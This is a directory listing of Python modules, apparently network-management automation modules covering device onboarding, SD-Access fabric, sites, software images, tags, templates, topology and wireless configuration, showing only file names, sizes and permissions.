pnp_device_claim_to_site.py File 3.37 KB 0644
pnp_device_config_preview.py File 2.08 KB 0644
pnp_device_count_info.py File 3.45 KB 0644
pnp_device_history_info.py File 2.7 KB 0644
pnp_device_import.py File 45.67 KB 0644
pnp_device_info.py File 13.87 KB 0644
pnp_device_reset.py File 3.04 KB 0644
pnp_device_unclaim.py File 1.68 KB 0644
pnp_global_settings.py File 7.96 KB 0644
pnp_global_settings_info.py File 3.04 KB 0644
pnp_intent.py File 30.29 KB 0644
pnp_server_profile_update.py File 5.13 KB 0644
pnp_smart_account_domains_info.py File 1.64 KB 0644
pnp_virtual_account_add.py File 5.16 KB 0644
pnp_virtual_account_deregister.py File 2.75 KB 0644
pnp_virtual_account_devices_sync.py File 5.33 KB 0644
pnp_virtual_account_sync_result_info.py File 2.73 KB 0644
pnp_virtual_accounts_info.py File 1.78 KB 0644
pnp_workflow.py File 7.73 KB 0644
pnp_workflow_count_info.py File 1.67 KB 0644
pnp_workflow_info.py File 4.15 KB 0644
profiling_rules_count_info.py File 1.89 KB 0644
profiling_rules_in_bulk_create.py File 5.86 KB 0644
projects_details_info.py File 2.38 KB 0644
qos_device_interface.py File 5.33 KB 0644
qos_device_interface_info.py File 3.19 KB 0644
qos_device_interface_info_count_info.py File 1.76 KB 0644
reports.py File 6.25 KB 0644
reports_executions_info.py File 3.25 KB 0644
reports_info.py File 3.91 KB 0644
reports_view_group_info.py File 2.73 KB 0644
reports_view_group_view_info.py File 3.5 KB 0644
reserve_ip_subpool.py File 6.32 KB 0644
reserve_ip_subpool_create.py File 4.39 KB 0644
reserve_ip_subpool_delete.py File 1.67 KB 0644
reserve_ip_subpool_info.py File 3.17 KB 0644
reserve_ip_subpool_update.py File 3.85 KB 0644
role_permissions_info.py File 1.72 KB 0644
roles_info.py File 1.9 KB 0644
sda_count_info.py File 1.37 KB 0644
sda_device_info.py File 1.82 KB 0644
sda_device_role_info.py File 1.84 KB 0644
sda_fabric.py File 1.84 KB 0644
sda_fabric_authentication_profile.py File 4.06 KB 0644
sda_fabric_authentication_profile_info.py File 2.3 KB 0644
sda_fabric_border_device.py File 7.19 KB 0644
sda_fabric_border_device_info.py File 5.96 KB 0644
sda_fabric_control_plane_device.py File 3.04 KB 0644
sda_fabric_control_plane_device_info.py File 2.04 KB 0644
sda_fabric_edge_device.py File 2.67 KB 0644
sda_fabric_edge_device_info.py File 1.91 KB 0644
sda_fabric_info.py File 1.51 KB 0644
sda_fabric_site.py File 2.8 KB 0644
sda_fabric_site_info.py File 1.8 KB 0644
sda_multicast.py File 3.79 KB 0644
sda_multicast_info.py File 2.19 KB 0644
sda_port_assignment_for_access_point.py File 3.51 KB 0644
sda_port_assignment_for_access_point_info.py File 2.32 KB 0644
sda_port_assignment_for_user_device.py File 4.16 KB 0644
sda_port_assignment_for_user_device_info.py File 2.28 KB 0644
sda_provision_device.py File 3.37 KB 0644
sda_provision_device_info.py File 1.82 KB 0644
sda_virtual_network.py File 2.5 KB 0644
sda_virtual_network_info.py File 1.96 KB 0644
sda_virtual_network_ip_pool.py File 4.93 KB 0644
sda_virtual_network_ip_pool_info.py File 2.3 KB 0644
sda_virtual_network_v2.py File 3.83 KB 0644
sda_virtual_network_v2_info.py File 1.93 KB 0644
security_advisories_devices_info.py File 1.81 KB 0644
security_advisories_ids_per_device_info.py File 1.95 KB 0644
security_advisories_info.py File 1.97 KB 0644
security_advisories_per_device_info.py File 2.17 KB 0644
security_advisories_summary_info.py File 2.25 KB 0644
sensor.py File 6.52 KB 0644
sensor_info.py File 2.13 KB 0644
sensor_test_run.py File 1.45 KB 0644
sensor_test_template_duplicate.py File 4.93 KB 0644
sensor_test_template_edit.py File 6.9 KB 0644
service_provider_create.py File 2.06 KB 0644
service_provider_info.py File 2.1 KB 0644
service_provider_profile_delete.py File 1.68 KB 0644
service_provider_update.py File 2.19 KB 0644
service_provider_v2.py File 2.89 KB 0644
service_provider_v2_info.py File 2.13 KB 0644
site_assign_credential.py File 2.24 KB 0644
site_assign_device.py File 1.59 KB 0644
site_count_info.py File 1.58 KB 0644
site_create.py File 3.92 KB 0644
site_delete.py File 1.55 KB 0644
site_design_floormap.py File 2.27 KB 0644
site_design_floormap_info.py File 1.93 KB 0644
site_health_info.py File 3.99 KB 0644
site_info.py File 2.35 KB 0644
site_intent.py File 18.24 KB 0644
site_membership_info.py File 2.34 KB 0644
site_update.py File 3.59 KB 0644
snmp_properties.py File 2.19 KB 0644
snmp_properties_info.py File 1.72 KB 0644
snmpv2_read_community_credential.py File 3 KB 0644
snmpv2_write_community_credential.py File 3.02 KB 0644
snmpv3_credential.py File 3.67 KB 0644
sp_profile_delete_v2.py File 1.66 KB 0644
swim_image_details_info.py File 5.06 KB 0644
swim_import_local.py File 2.41 KB 0644
swim_import_via_url.py File 2.92 KB 0644
swim_intent.py File 29 KB 0644
swim_trigger_activation.py File 2.92 KB 0644
swim_trigger_distribution.py File 2.1 KB 0644
syslog_config_create.py File 2.01 KB 0644
syslog_config_update.py File 2.01 KB 0644
system_health_count_info.py File 2.1 KB 0644
system_health_info.py File 2.74 KB 0644
system_performance_historical_info.py File 2.73 KB 0644
system_performance_info.py File 2.72 KB 0644
tag.py File 4.1 KB 0644
tag_count_info.py File 2.02 KB 0644
tag_info.py File 3.95 KB 0644
tag_member.py File 2.52 KB 0644
tag_member_count_info.py File 1.94 KB 0644
tag_member_info.py File 2.71 KB 0644
tag_member_type_info.py File 1.56 KB 0644
tag_membership.py File 2.03 KB 0644
task_count_info.py File 2.87 KB 0644
task_info.py File 4.5 KB 0644
task_operation_info.py File 2.57 KB 0644
task_tree_info.py File 2.2 KB 0644
template_intent.py File 35.52 KB 0644
template_preview.py File 1.93 KB 0644
templates_details_info.py File 9.67 KB 0644
threat_detail.py File 2.15 KB 0644
threat_detail_count.py File 1.88 KB 0644
threat_summary.py File 1.87 KB 0644
topology_layer_2_info.py File 3.38 KB 0644
topology_layer_3_info.py File 3.42 KB 0644
topology_network_health_info.py File 2.77 KB 0644
topology_physical_info.py File 3.38 KB 0644
topology_site_info.py File 1.92 KB 0644
topology_vlan_details_info.py File 1.58 KB 0644
transit_peer_network.py File 3.64 KB 0644
transit_peer_network_info.py File 2.17 KB 0644
user.py File 2.64 KB 0644
user_enrichment_details_info.py File 4.94 KB 0644
user_info.py File 1.89 KB 0644
users_external_servers_info.py File 2.12 KB 0644
wireless_accespoint_configuration.py File 12.09 KB 0644
wireless_accesspoint_configuration_summary_info.py File 4.36 KB 0644
wireless_dynamic_interface.py File 2.63 KB 0644
wireless_dynamic_interface_info.py File 1.86 KB 0644
wireless_enterprise_ssid.py File 5.6 KB 0644
wireless_enterprise_ssid_info.py File 2.89 KB 0644
wireless_profile.py File 5.16 KB 0644
wireless_profile_info.py File 2.16 KB 0644
wireless_provision_access_point.py File 2.53 KB 0644
wireless_provision_device_create.py File 3.01 KB 0644
wireless_provision_device_update.py File 2.99 KB 0644
wireless_provision_ssid_create_provision.py File 3.74 KB 0644
wireless_provision_ssid_delete_reprovision.py File 2.06 KB 0644
wireless_psk_override.py File 2.04 KB 0644
wireless_rf_profile.py File 5.96 KB 0644
wireless_rf_profile_info.py File 2.69 KB 0644
wireless_sensor_test_results_info.py File 3.52 KB 0644